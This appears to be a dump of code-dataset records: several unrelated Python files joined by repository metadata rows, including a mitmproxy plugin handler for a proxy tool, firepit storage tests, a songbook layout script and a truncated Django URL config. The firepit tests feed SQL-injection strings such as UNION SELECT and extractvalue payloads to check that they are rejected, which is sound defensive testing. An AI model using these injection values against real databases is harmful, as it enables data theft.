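# add_fill() accepts any execution object exposing ``size`` and ``price``;
# the namedtuple and the numbers below are assumptions made for this demo.
def _demo_fill_price():
    from collections import namedtuple
    Fill = namedtuple('Fill', ['size', 'price'])
    order = Order(side='buy', pair='BTC/USD', size=3, price=100.0,
                  stop_loss_price=90.0, id=1)
    order.add_fill(Fill(size=2, price=99.0))
    order.add_fill(Fill(size=1, price=102.0))
    # volume-weighted average: (2*99.0 + 1*102.0) / 3 == 100.0
    return order.get_fill_price()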
| 26.071429 | 69 | 0.609589 | 729 | 0.99863 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
731c7020273e619e347b608e87b47d20ed636f00 | 3,515 | py | Python | core/handler.py | mh4x0f/kinproxy | 72dd24eb5ff5286c2bb57524124934a54614f9ec | [
"MIT"
]
| 5 | 2018-01-20T15:33:14.000Z | 2021-06-29T04:26:44.000Z | core/handler.py | mh4x0f/kinproxy | 72dd24eb5ff5286c2bb57524124934a54614f9ec | [
"MIT"
]
| null | null | null | core/handler.py | mh4x0f/kinproxy | 72dd24eb5ff5286c2bb57524124934a54614f9ec | [
"MIT"
]
| 1 | 2019-03-08T18:46:05.000Z | 2019-03-08T18:46:05.000Z | try:
from mitmproxy import controller, proxy
from mitmproxy.proxy.server import ProxyServer
except:
from libmproxy import controller, proxy
from libmproxy.proxy.server import ProxyServer
from plugins import *
from threading import Thread
from core.config.settings import SettingsINI
# MIT License
#
# Copyright (c) 2018 Marcos Nesster
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
class ThreadController(Thread):
def __init__(self,main ,parent=None):
super(ThreadController, self).__init__(parent)
self.main = main
def run(self):
try:
controller.Master.run(self.main)
except KeyboardInterrupt:
self.main.shutdown()
def stop(self):
self.main.shutdown()
class MasterHandler(controller.Master):
def __init__(self, server,session):
controller.Master.__init__(self, server)
self.config = SettingsINI('core/pumpkinProxy.ini')
self.session = session
self.plugins = []
self.initializePlugins()
def run(self):
self.thread = ThreadController(self)
self.thread.start()
def disablePlugin(self,name):
''' disable plugin by name '''
print('plugin:{} status:OFF'.format(name))
for plugin in self.plugins:
if plugin.name == name:
self.plugins.remove(plugin)
def initializePlugins(self):
plugin_classes = plugin.PluginTemplate.__subclasses__()
for p in plugin_classes:
if self.config.get_setting('plugins',p.name,format=bool):
print('plugins::{0:20} status:On'.format(p.name))
self.plugins.append(p())
        # initialize logging in all enabled plugins
for instance in self.plugins:
instance.init_logger(self.session)
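    # --- Illustrative sketch; not part of the original module. ---
    # initializePlugins() reads core/pumpkinProxy.ini and expects one boolean
    # per plugin class name under a [plugins] section, e.g. (plugin names assumed):
    #   [plugins]
    #   dns_spoof = true
    #   js_injector = false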
def handle_request(self, flow):
'''
print "-- request --"
print flow.__dict__
print flow.request.__dict__
print flow.request.headers.__dict__
print "--------------"
print
'''
for p in self.plugins:
p.request(flow)
flow.reply()
def handle_response(self, flow):
'''
print
print "-- response --"
print flow.__dict__
print flow.response.__dict__
print flow.response.headers.__dict__
print "--------------"
print
'''
for p in self.plugins:
p.response(flow)
#print flow.__dict__
flow.reply()
| 33.47619 | 80 | 0.657183 | 2,101 | 0.597724 | 0 | 0 | 0 | 0 | 0 | 0 | 1,674 | 0.476245 |
731d1cfc50fdedf83932598a710d90798e979c30 | 4,940 | py | Python | mapping/sandbox/graphslam/graphslam_pipeline.py | sameeptandon/sail-car-log | 0ee3d598bb09d389bcbd2ebf73cd4b2411e796be | [
"BSD-2-Clause"
]
| 1 | 2021-02-24T03:11:13.000Z | 2021-02-24T03:11:13.000Z | mapping/sandbox/graphslam/graphslam_pipeline.py | sameeptandon/sail-car-log | 0ee3d598bb09d389bcbd2ebf73cd4b2411e796be | [
"BSD-2-Clause"
]
| null | null | null | mapping/sandbox/graphslam/graphslam_pipeline.py | sameeptandon/sail-car-log | 0ee3d598bb09d389bcbd2ebf73cd4b2411e796be | [
"BSD-2-Clause"
]
| 3 | 2015-03-18T14:36:04.000Z | 2018-07-04T02:57:24.000Z | import os
from os.path import join as pjoin
from subprocess import check_call
from ruffus import files, follows, pipeline_run, pipeline_printout, pipeline_printout_graph, jobs_limit
from graphslam_config import GRAPHSLAM_PATH,\
GRAPHSLAM_MATCH_DIR, GRAPHSLAM_OPT_POS_DIR, GRAPHSLAM_ALIGN_DIR,\
MATCHES_FILE, GPS_FILES, RSS_LIST, GRAPHSLAM_OUT_DIR, GRAPHSLAM_DIRS,\
GRAPHSLAM_MAPS_DIR, GRAPHSLAM_VIDEOS_DIR, GRAPHSLAM_EVAL_DIR
from pipeline_config import NUM_CPUS, SAIL_CAR_LOG_PATH
from pipeline_utils import print_and_call, touchf
@files(None, MATCHES_FILE)
def match_traces(dummy, output_file):
cmd = 'python %s/match_traces.py %s' % (GRAPHSLAM_PATH, GRAPHSLAM_MATCH_DIR)
print_and_call(cmd)
# NOTE Have to rerun this after match_traces is run
@follows('match_traces')
@files(zip(GPS_FILES, [pjoin(GRAPHSLAM_OPT_POS_DIR, '--'.join(rss) + '.npz') for rss in RSS_LIST], GPS_FILES))
def solve_qps(gps_src_file, output_file, gps_tgt_file):
cmd = 'python %s/solve_qp.py %s %s %s' % (GRAPHSLAM_PATH,
gps_src_file, gps_tgt_file, output_file)
print_and_call(cmd)
@follows('solve_qps')
@jobs_limit(1)
@files(MATCHES_FILE, '%s/run_pipeline_sentinel' % GRAPHSLAM_OUT_DIR)
def run_pipelines(dummy, sentinel):
for route, segment, split in RSS_LIST:
cmd = 'export SCL_ROUTE=%s; export SCL_SEGMENT=%s; export SCL_SPLIT=%s; python %s/mapping/pipeline/pipeline.py run estimate_normals' % (route, segment, split, SAIL_CAR_LOG_PATH)
print_and_call(cmd)
touchf('%s/run_pipeline_sentinel' % GRAPHSLAM_OUT_DIR)
def clean_pipelines():
for route, segment, split in RSS_LIST:
cmd = 'export SCL_ROUTE=%s; export SCL_SEGMENT=%s; export SCL_SPLIT=%s; python %s/mapping/pipeline/pipeline.py clean' % (route, segment, split, SAIL_CAR_LOG_PATH)
print_and_call(cmd)
@follows('run_pipelines')
@files('%s/run_pipeline_sentinel' % GRAPHSLAM_OUT_DIR, '%s/chunk_and_align_sentinel' % GRAPHSLAM_ALIGN_DIR)
def chunk_and_align(dummy, sentinel):
cmd = 'python %s/chunk_and_align.py' % GRAPHSLAM_PATH
print_and_call(cmd)
touchf('%s/chunk_and_align_sentinel' % GRAPHSLAM_ALIGN_DIR)
@follows('chunk_and_align')
@files('%s/chunk_and_align_sentinel' % GRAPHSLAM_ALIGN_DIR,
'%s/export_maps_sentinel' % GRAPHSLAM_MAPS_DIR)
def export_maps(dummy, sentinel):
cmd = 'python scripts/export_maps.py'
print_and_call(cmd)
touchf('%s/export_maps_sentinel' % GRAPHSLAM_MAPS_DIR)
@follows('export_maps')
@files('%s/export_maps_sentinel' % GRAPHSLAM_MAPS_DIR,
'%s/align_maps_sentinel' % GRAPHSLAM_MAPS_DIR)
def align_maps(dummy, sentinel):
cmd = 'python scripts/align_maps_all.py'
print_and_call(cmd)
touchf('%s/align_maps_sentinel' % GRAPHSLAM_MAPS_DIR)
@follows('align_maps')
@files('%s/align_maps_sentinel' % GRAPHSLAM_MAPS_DIR,
'%s/eval_maps_sentinel' % GRAPHSLAM_EVAL_DIR)
def eval_maps(dummy, sentinel):
cmd = 'python scripts/eval_maps.py'
print_and_call(cmd)
touchf('%s/eval_maps_sentinel' % GRAPHSLAM_EVAL_DIR)
@follows('eval_maps')
@files('%s/align_maps_sentinel' % GRAPHSLAM_MAPS_DIR,
'%s/generate_videos_sentinel' % GRAPHSLAM_VIDEOS_DIR)
def generate_videos(dummy, sentinel):
cmd = 'python scripts/generate_videos.py'
print_and_call(cmd)
touchf('%s/generate_videos_sentinel' % GRAPHSLAM_VIDEOS_DIR)
def clean():
for d in GRAPHSLAM_DIRS:
print 'deleting %s' % d
if os.path.exists(d):
check_call('rm -r %s' % d, shell=True)
if __name__ == '__main__':
import sys
if len(sys.argv) < 2:
print 'Usage: python graphslam_pipeline.py print,graph,run (task1,task2)'
sys.exit(1)
TORUN = [
]
if len(sys.argv) == 3:
TORUN = sys.argv[2].split(',')
CMDS = sys.argv[1].split(',')
tasks = {
'print': lambda: pipeline_printout(sys.stdout, TORUN,
forcedtorun_tasks=[], verbose=5),
'graph': lambda: pipeline_printout_graph('graph.jpg', 'jpg', TORUN,
forcedtorun_tasks=[],
no_key_legend=False),
'run': lambda: pipeline_run(TORUN,
multiprocess=NUM_CPUS,
one_second_per_job=False),
'force': lambda: pipeline_run([],
forcedtorun_tasks=TORUN,
multiprocess=NUM_CPUS,
one_second_per_job=False),
'printf': lambda: pipeline_printout(sys.stdout,
[],
forcedtorun_tasks=TORUN,
verbose=2),
'clean': clean,
'clean_pipelines': clean_pipelines
}
for key in tasks:
if key in CMDS:
tasks[key]()
| 37.424242 | 185 | 0.654049 | 0 | 0 | 0 | 0 | 2,448 | 0.495547 | 0 | 0 | 1,232 | 0.249393 |
731e4596b4a14f1da0dc95574358cfa12ef495f2 | 319 | py | Python | sandbox/wavelets.py | EtalumaSupport/LumaViewPro | ab9678c04fc561e6fce8b774c5d87cc91d6f3e07 | [
"MIT"
]
| null | null | null | sandbox/wavelets.py | EtalumaSupport/LumaViewPro | ab9678c04fc561e6fce8b774c5d87cc91d6f3e07 | [
"MIT"
]
| 59 | 2021-03-26T19:22:59.000Z | 2021-12-04T00:42:12.000Z | sandbox/wavelets.py | EtalumaSupport/LumaViewPro | ab9678c04fc561e6fce8b774c5d87cc91d6f3e07 | [
"MIT"
]
| null | null | null | import numpy as np
import matplotlib.pyplot as plt
from astropy.convolution import RickerWavelet2DKernel
ricker_2d_kernel = RickerWavelet2DKernel(5)
plt.imshow(ricker_2d_kernel, interpolation='none', origin='lower')
plt.xlabel('x [pixels]')
plt.ylabel('y [pixels]')
plt.colorbar()
plt.show()
print(ricker_2d_kernel)
| 22.785714 | 66 | 0.793103 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 37 | 0.115987 |
731e657c5103db0d7c66fbe61179c7894a85d4d3 | 5,267 | py | Python | tests/test_errors.py | raymundl/firepit | 5b913806eef646c02bd55e301b19baa052aa29d5 | [
"Apache-2.0"
]
| null | null | null | tests/test_errors.py | raymundl/firepit | 5b913806eef646c02bd55e301b19baa052aa29d5 | [
"Apache-2.0"
]
| null | null | null | tests/test_errors.py | raymundl/firepit | 5b913806eef646c02bd55e301b19baa052aa29d5 | [
"Apache-2.0"
]
| null | null | null | import os
import pytest
from firepit.exceptions import IncompatibleType
from firepit.exceptions import InvalidAttr
from firepit.exceptions import InvalidStixPath
from firepit.exceptions import InvalidViewname
from firepit.exceptions import StixPatternError
from .helpers import tmp_storage
@pytest.fixture
def invalid_bundle_file():
cwd = os.path.dirname(os.path.abspath(__file__))
return os.path.join(cwd, 'test_error_bundle.json')
def test_local(invalid_bundle_file, tmpdir):
store = tmp_storage(tmpdir)
store.cache('q1', [invalid_bundle_file])
def test_extract_bad_stix_pattern(fake_bundle_file, tmpdir):
store = tmp_storage(tmpdir)
store.cache('q1', [fake_bundle_file])
with pytest.raises(StixPatternError):
store.extract('junk', 'ipv4-addr', 'q1', "whatever")
def test_filter_bad_stix_pattern(fake_bundle_file, tmpdir):
store = tmp_storage(tmpdir)
store.cache('q1', [fake_bundle_file])
store.extract('urls', 'url', 'q1', "[url:value LIKE '%page/1%']")
with pytest.raises(StixPatternError):
store.filter('junk', 'url', 'urls', "value = 'http://www26.example.com/page/176'")
def test_filter_bad_input_view(fake_bundle_file, tmpdir):
store = tmp_storage(tmpdir)
store.cache('q1', [fake_bundle_file])
store.extract('urls', 'url', 'q1', "[url:value LIKE '%page/1%']")
with pytest.raises(InvalidViewname):
store.filter('junk', 'url', 'urls OR 1', "[url:value = 'http://www26.example.com/page/176']")
def test_sqli_1(fake_bundle_file, tmpdir):
store = tmp_storage(tmpdir)
store.cache('q1', [fake_bundle_file])
store.extract('urls', 'url', 'q1', "[url:value LIKE '%page/1%']")
with pytest.raises(InvalidViewname):
store.lookup('urls" UNION ALL SELECT * FROM "q1_url')
def test_sqli_2(fake_bundle_file, tmpdir):
store = tmp_storage(tmpdir)
store.cache('q1', [fake_bundle_file])
store.extract('urls', 'url', 'q1', "[url:value LIKE '%page/1%']")
with pytest.raises(InvalidAttr):
store.values('url:fake.path', 'urls')
with pytest.raises(InvalidStixPath):
store.values('value" FROM "q1_ipv4-addr" UNION ALL SELECT "value', 'urls')
def test_sqli_3(fake_bundle_file, tmpdir):
store = tmp_storage(tmpdir)
store.cache('q1', [fake_bundle_file])
store.extract('urls', 'url', 'q1', "[url:value LIKE '%page/1%']")
res = store.load('test_urls', [
{
'type': 'url',
'value': 'http://www26.example.com/page/176',
'risk': 'high',
},
{
'type': 'url',
'value': 'http://www67.example.com/page/264',
'risk': 'high',
}
])
with pytest.raises(InvalidViewname):
store.join('sqli" AS SELECT * FROM "q1_url"; CREATE VIEW "marked',
'urls', 'value', 'test_urls', 'value')
def test_empty_results(fake_bundle_file, tmpdir):
"""Look for finding objects that aren't there"""
store = tmp_storage(tmpdir)
store.cache('q1', [fake_bundle_file])
store.extract('my_findings', 'x-ibm-finding', 'q1', "[x-ibm-finding:name = 'Whatever']")
findings = store.lookup('my_findings')
assert findings == []
def test_lookup_bad_columns(fake_bundle_file, tmpdir):
store = tmp_storage(tmpdir)
store.cache('q1', [fake_bundle_file])
store.extract('urls', 'url', 'q1', "[url:value LIKE '%page/1%']")
with pytest.raises(InvalidAttr):
store.lookup('urls', cols="1; select * from urls; --")
def test_lookup_bad_offset(fake_bundle_file, tmpdir):
store = tmp_storage(tmpdir)
store.cache('q1', [fake_bundle_file])
store.extract('urls', 'url', 'q1', "[url:value LIKE '%page/1%']")
with pytest.raises(TypeError):
store.lookup('urls', offset="1; select * from urls; --")
def test_bad_groupby(fake_bundle_file, fake_csv_file, tmpdir):
store = tmp_storage(tmpdir)
store.cache('q1', [fake_bundle_file])
store.extract('users', 'user-account', 'q1', "[ipv4-addr:value LIKE '10.%']")
with pytest.raises(InvalidStixPath):
store.assign('grouped_users', 'users', op='group',
by='1,extractvalue(0x0a,concat(0x0a,(select database())))--')
def test_assign_bad_columns(fake_bundle_file, tmpdir):
store = tmp_storage(tmpdir)
store.cache('q1', [fake_bundle_file])
store.extract('urls', 'url', 'q1', "[url:value LIKE '%page/1%']")
with pytest.raises(InvalidStixPath):
store.assign('sorted', 'urls', op='sort',
by='value LIMIT 1; SELECT * FROM "urls"')
def test_sort_bad_limit(fake_bundle_file, tmpdir):
store = tmp_storage(tmpdir)
store.cache('q1', [fake_bundle_file])
store.extract('urls', 'url', 'q1', "[url:value LIKE '%page/1%']")
with pytest.raises(TypeError):
store.assign('sorted', 'urls', op='sort', by='value', limit='1; SELECT 1; --')
def test_merge_fail(fake_bundle_file, tmpdir):
store = tmp_storage(tmpdir)
store.cache('test-bundle', [fake_bundle_file])
store.extract('urls', 'url', 'test-bundle', "[url:value LIKE '%page/1%']")
store.extract('ips', 'ipv4-addr', 'test-bundle', "[ipv4-addr:value != '8.8.8.8']")
with pytest.raises(IncompatibleType):
store.merge('merged', ['urls', 'ips'])
| 35.587838 | 101 | 0.652933 | 0 | 0 | 0 | 0 | 150 | 0.028479 | 0 | 0 | 1,565 | 0.297133 |
731f66af557f8e0f3fe1a093bf5c18d9478212d8 | 11,798 | py | Python | script/run_scribus.py | csneofreak/public-domain-season-songs | d6e559e7cfe6e3a7ab784855a096d02ae8c656cd | [
"Unlicense"
]
| 14 | 2015-12-18T10:52:15.000Z | 2021-01-11T14:43:47.000Z | script/run_scribus.py | csneofreak/public-domain-season-songs | d6e559e7cfe6e3a7ab784855a096d02ae8c656cd | [
"Unlicense"
]
| 1 | 2015-12-05T19:30:01.000Z | 2015-12-05T19:30:01.000Z | script/run_scribus.py | csneofreak/public-domain-season-songs | d6e559e7cfe6e3a7ab784855a096d02ae8c656cd | [
"Unlicense"
]
| 9 | 2015-03-11T04:09:23.000Z | 2021-12-18T21:44:47.000Z | #!/usr/bin/python
# -*- coding: utf-8 -*-
import time
import json
import os
import math
import scribus
import simplebin
import inspect
from collections import defaultdict
PWD = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
def pwd(path):
return os.path.join(PWD, path);
DATA_FILE = pwd("data.json")
CACHE_FILE = pwd("cache.json")
MANUEL_PROCESSING_FILE = pwd("manual_processing.json")
FILES = pwd("lily_output/")
FAST = False # use this to debug
SPACING_SONGS = 10
EFFECTIVE_PAGE_HEIGHT = 255 + SPACING_SONGS
SPACING_HEADLINE_SONG = 18
SPACING_SONG_TEXT = 5
PAGE_NUM_HEIGHT = 5
BASELINE_GRID = 5
def init():
scribus.openDoc(pwd("init.sla"))
scribus.saveDocAs("/tmp/{}.sla".format(time.time()))
scribus.setUnit(scribus.UNIT_MM)
def front_matter():
# load pages from other document
if not os.path.exists(pwd("front_matter.sla")):
print "not front matter, file not found!"
return
scribus.openDoc(pwd("front_matter.sla"))
pages = scribus.pageCount()
scribus.closeDoc()
scribus.importPage(
pwd("front_matter.sla"), # filename
tuple(range(1, pages+1)), # range of pages to import
1, # insert (1) or replace(0)
0, # where to insert
)
scribus.gotoPage(pages+1)
def fit_height(textbox):
# come to a state that the text box does not overflow:
width, height = scribus.getSize(textbox)
to_add = height + 1
while scribus.textOverflows(textbox):
scribus.sizeObject(width, height + to_add, textbox)
to_add = to_add * 2
# reduce height
step = height/2
overflows = False
counter = 0
while step > 0.05 or overflows:
counter += 1
width, old_height = scribus.getSize(textbox)
if scribus.textOverflows(textbox):
scribus.sizeObject(width, old_height + step, textbox)
else:
scribus.sizeObject(width, old_height - step, textbox)
step = step * 0.5
overflows = scribus.textOverflows(textbox)
def new_page():
scribus.newPage(-1)
scribus.gotoPage(scribus.pageCount())
add_page_number()
def add_page_number():
page_num = scribus.pageCount()
page_width, page_height, margin_top, margin_left, margin_right, margin_bottom = page_size_margin(page_num)
textbox = scribus.createText(margin_left, page_height-margin_bottom, page_width-margin_left-margin_right, PAGE_NUM_HEIGHT)
scribus.setStyle("pagenumber_{}".format(get_style_suffix()), textbox)
scribus.insertText(str(page_num), 0, textbox)
scribus.deselectAll()
def page_size_margin(page_num):
size = scribus.getPageNSize(page_num)
margin = scribus.getPageNMargins(page_num)
return size + margin
def get_style_suffix():
page_num = scribus.pageCount()
style_suffix = "r" # is this really the right way? is there no shortcut provided by scribus?
if page_num % 2 == 0:
style_suffix = "l"
return style_suffix
def load_song(data, offset, settings):
page_num = scribus.pageCount()
page_width, page_height, margin_top, margin_left, margin_right, margin_bottom = page_size_margin(page_num)
start_point = margin_top + offset
new_width = page_width - margin_left - margin_right
if not FAST:
scribus.placeEPS(os.path.join(FILES, data["filename"]), 0, 0)
eps = scribus.getSelectedObject()
eps_width, eps_height = scribus.getSize(eps)
#scribus.scaleGroup(new_width/eps_width) # slow on scribus 1.4; does something else on scribus 1.5
scribus.sizeObject(eps_width*0.86, eps_height*0.86, eps)
scribus.moveObjectAbs(margin_left, start_point+SPACING_HEADLINE_SONG, eps)
eps_width, eps_height = scribus.getSize(eps)
else:
eps_height = 0
scribus.deselectAll()
textbox = scribus.createText(margin_left, start_point, new_width, 20)
style_suffix = get_style_suffix()
if data["composer"]:
scribus.deselectAll()
scribus.insertText(u"{}\n".format(data["composer"]), 0, textbox)
scribus.selectText(0, 1, textbox)
scribus.setStyle("subline_{}".format(style_suffix), textbox)
if data["poet"]:
scribus.deselectAll()
scribus.insertText(u"{}\n".format(data["poet"]), 0, textbox)
scribus.selectText(0, 1, textbox)
scribus.setStyle("subline_{}".format(style_suffix), textbox)
scribus.deselectAll()
scribus.insertText(u"{}\n".format(data["name"]), 0, textbox)
scribus.selectText(0, 1, textbox)
scribus.setStyle("headline_{}".format(style_suffix), textbox)
text = data["text"]
text = [t.strip() for t in text if t.strip() != ""]
# TODO: exit if text == []
textbox = scribus.createText(margin_left, start_point + eps_height + SPACING_HEADLINE_SONG + SPACING_SONG_TEXT, new_width, 50)
scribus.setStyle("text", textbox)
# let's see how many digits are in there:
num_verses = len([l for l in text if l.isdigit()])
num_chars = 0
num_line_total = len(text)
num_line_actually = 0
no_new_line = False
verse_counter = 0
text_columns_height = 0 # TODO: should be None
for num_line, line in enumerate(text):
if line.strip == "":
continue
num_line_actually += 1
if line.isdigit():
print "#", verse_counter, math.ceil(num_verses * 0.5), num_verses, data["filename"]
if verse_counter == math.ceil(num_verses*0.5): # this is the first verse that should be in the new column, so let's see what's the height
print text_columns_height, num_line_actually
text_columns_height = BASELINE_GRID * (num_line_actually -1)
first_char = "\n"
if num_line == 0:
first_char = ""
no_new_line = True
line = u"{}{}.\t".format(first_char, line)
scribus.insertText(line, -1, textbox)
scribus.deselectAll()
scribus.selectText(num_chars, len(line), textbox)
#scribus.setStyle("num", textbox) # no character styles available
#scribus.setFontSize(5, textbox) # TODO: testing only # BUG?
scribus.setFont("Linux Libertine O Bold", textbox)
num_chars += len(line)
verse_counter += 1
else:
if no_new_line:
first_char = ""
else:
first_char = chr(28)
no_new_line = False
line = u"{}{}".format(first_char, line)
scribus.insertText(line, -1, textbox)
#scribus.deselectAll()
#scribus.selectText(num_chars, len(line), textbox)
#scribus.setStyle("text", textbox)
num_chars += len(line)
scribus.setColumnGap(5, textbox)
columns = settings.get("columns", 2)
scribus.setColumns(columns, textbox)
if columns != 2:
fit_height(textbox)
else:
scribus.sizeObject(new_width, text_columns_height, textbox)
l, t = scribus.getPosition(textbox)
scribus.moveObjectAbs(l, round(t/BASELINE_GRID)*BASELINE_GRID, textbox)
if scribus.textOverflows(textbox):
fit_height(textbox) # there are some cases,..
text_width, text_height = scribus.getSize(textbox)
text_left, text_top = scribus.getPosition(textbox)
return text_top + text_height - start_point + SPACING_SONGS, page_num
def create_toc(data):
if not scribus.objectExists("TOC"):
new_page()
page_width, page_height, margin_top, margin_left, margin_right, margin_bottom = page_size_margin(1)
toc = scribus.createText(margin_left, margin_top, page_width-margin_right-margin_left, page_height-margin_top-margin_bottom)
scribus.setNewName("TOC", toc)
scribus.insertText("provide a textframe with name 'TOC' in front_matter.sla and i will not create the toc at the end of the document", 0, "TOC")
text = "\n".join(("{}\t{}".format(title, pagenum) for (title, pagenum) in data))
scribus.insertText(text, -1, "TOC")
def add_songs(all_songs, songs_double_page, manual_processing, songs_data, cache):
# let's get the best sorting
songs_combined = simplebin.best_fit(all_songs, EFFECTIVE_PAGE_HEIGHT)
# sorting the songs alphabetic
songs_sorted = sorted(songs_combined, key=lambda x: x[0])
# make sure the double page will be added on the left side
page_num = scribus.pageCount()
for double_page in songs_double_page:
if not double_page in all_songs:
continue
offset = songs_sorted.index([double_page])
songs_sorted.insert(offset+1, None) # add a empty page after the song
if (page_num + offset) % 2 != 0: # song is on right side, empty side on the left side.
songs_sorted.insert(offset, songs_sorted.pop(offset+2)) # move next song before the double page
# TODO: what if double sided song is last song?
for songs in songs_sorted:
current_pos = 0
if songs == None: # we added this for a song that should be set on double page
new_page()
continue
for filename in songs:
if not manual_processing[filename].get("show", True):
continue
data = songs_data[filename]
height, page_num = load_song(data, current_pos, manual_processing[filename])
current_pos += math.ceil(height/BASELINE_GRID) * BASELINE_GRID
cache[filename]["height"] = round(height, 2)
cache[filename]["page"] = page_num
scribus.progressSet(1)
if current_pos != 0:
new_page()
def main():
cache = defaultdict(dict)
try:
with open(CACHE_FILE, "rb") as cache_file:
cache = defaultdict(dict, json.load(cache_file))
except:
pass
with open(DATA_FILE, "rb") as data_file:
songs_data = json.load(data_file)
with open(MANUEL_PROCESSING_FILE, "rb") as manual_file:
manual_processing = defaultdict(dict, json.load(manual_file))
scribus.statusMessage("Running script...")
scribus.progressReset()
scribus.progressTotal(len(songs_data))
init()
front_matter()
add_page_number()
# trying to get the best sorting
# setting all songs to the max height
all_songs = dict(zip(songs_data.keys(), [EFFECTIVE_PAGE_HEIGHT] * len(songs_data)))
# update according to cache
for song_name, data in cache.iteritems():
all_songs[song_name] = min(data.get("height", EFFECTIVE_PAGE_HEIGHT), EFFECTIVE_PAGE_HEIGHT)
# let's see which songs should be set on a double sided page:
songs_double_page = filter(lambda x: manual_processing[x].get("double_page", False), manual_processing)
for double_page in songs_double_page:
all_songs[double_page] = EFFECTIVE_PAGE_HEIGHT # all double page songs should get a whole page despite their height
appendix_filter = lambda a_s, boolean : {k:v for k,v in a_s.iteritems() if manual_processing[k].get("appendix", False) == boolean}
main_songs = appendix_filter(all_songs, False)
add_songs(main_songs, songs_double_page, manual_processing, songs_data, cache)
appendix_songs = appendix_filter(all_songs, True)
add_songs(appendix_songs, songs_double_page, manual_processing, songs_data, cache)
toc = []
for filename in filter(lambda s: manual_processing[s].get("show", True), all_songs.keys()):
toc.append((songs_data[filename]["name"], cache[filename].get("page", "XX")))
toc.sort(key=lambda (x,y): x)
create_toc(toc)
if scribus.haveDoc():
scribus.setRedraw(True)
scribus.statusMessage("")
scribus.progressReset()
with open(CACHE_FILE, "wb") as cache_file:
json.dump(cache, cache_file, indent=2)
if __name__ == "__main__":
main()
| 37.693291 | 152 | 0.66418 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,073 | 0.175708 |
73204039a36f632a872aa19aeb8f09ee3f95315d | 424 | py | Python | 12-transformar_metro.py | tainagirotto/exercicios-py | 39107c05a0a8e5230cd48876ad8e1ad6f0a2ff59 | [
"MIT"
]
| null | null | null | 12-transformar_metro.py | tainagirotto/exercicios-py | 39107c05a0a8e5230cd48876ad8e1ad6f0a2ff59 | [
"MIT"
]
| null | null | null | 12-transformar_metro.py | tainagirotto/exercicios-py | 39107c05a0a8e5230cd48876ad8e1ad6f0a2ff59 | [
"MIT"
]
| null | null | null | # Read a number in meters and print its value converted to dm, cm, mm, km, hm and dam:
m = float(input('Digite o valor em metros: '))
dm = m * 10
cm = m * 100
mm = m * 1000
km = m/1000
hm = m/100
dam = m/10
print('O valor em cm é {}' .format(cm))
print('O valor em milímetros é {}' .format(mm))
print('O valor em dm é {}' .format(dm))
print('O valor em km é {}' .format(km))
print('O valor em hm é {}' .format(hm))
print('O valor em dam é {}' .format(dam))
| 24.941176 | 57 | 0.613208 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 215 | 0.5 |
73212f2cfd8e6dccfeaf70d354cab83a3bcc2ae2 | 3,059 | py | Python | src/urls.py | chunky2808/Hire-Me | 7a43fb2f555a5f46e285d24c18457c2ce1c0d225 | [
"MIT"
]
| null | null | null | src/urls.py | chunky2808/Hire-Me | 7a43fb2f555a5f46e285d24c18457c2ce1c0d225 | [
"MIT"
]
| 6 | 2020-02-12T00:41:15.000Z | 2022-03-11T23:20:37.000Z | src/urls.py | chunky2808/Hire-Me | 7a43fb2f555a5f46e285d24c18457c2ce1c0d225 | [
"MIT"
]
| null | null | null | """src URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url,include
from django.contrib import admin
from accounts import views as accounts_views
from hire import views as hire_views
from django.contrib.auth import views as auth_views
from chat_app import views as chat_views
from django.conf.urls.static import static
from django.conf import settings
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^$', hire_views.mainee,name = 'maiee'),
url(r'^accounts/', include('django.contrib.auth.urls')),
url(r'^accounts/signup/$', accounts_views.signup, name='signup'),
url(r'^accounts/signup/customer/$', accounts_views.CustomerSignUpView.as_view(), name='customer_signup'),
url(r'^accounts/signup/service/$', accounts_views.ServiceSignUpView.as_view(), name='service_signup'),
url(r'^chat/(?P<stri_id>\w+?)/', chat_views.chat, name='index'),
url(r'^chatbox/(?P<stri_id>\w+?)/', chat_views.chatbox, name='chat'),
url(r'^oauth/', include('social_django.urls', namespace='social')), # <--
url(r'^login/$', auth_views.LoginView.as_view(template_name='login.html'), name='login'),
url(r'^logout/$', auth_views.LogoutView.as_view(), name='logout'),
url(r'^services/$', hire_views.home, name='home'),
url(r'^services/new/$', hire_views.add_service, name='new_service'),
url(r'^services/(?P<pk>\d+)/$', hire_views.list_services, name='serve_list'),
url(r'^services/(?P<pk>\d+)/new/$', hire_views.list_services_new, name='new_serve_list'),
url(r'^services/(?P<pk>\d+)/delete/$', hire_views.delete_main, name='delete'),
url(r'^services/(?P<pk>\d+)/(?P<Service_category_pk>\d+)/review/$', hire_views.review, name='review'),
url(r'^services/(?P<pk>\d+)/(?P<Service_category_pk>\d+)/review/new/$', hire_views.review_new, name='review_new'),
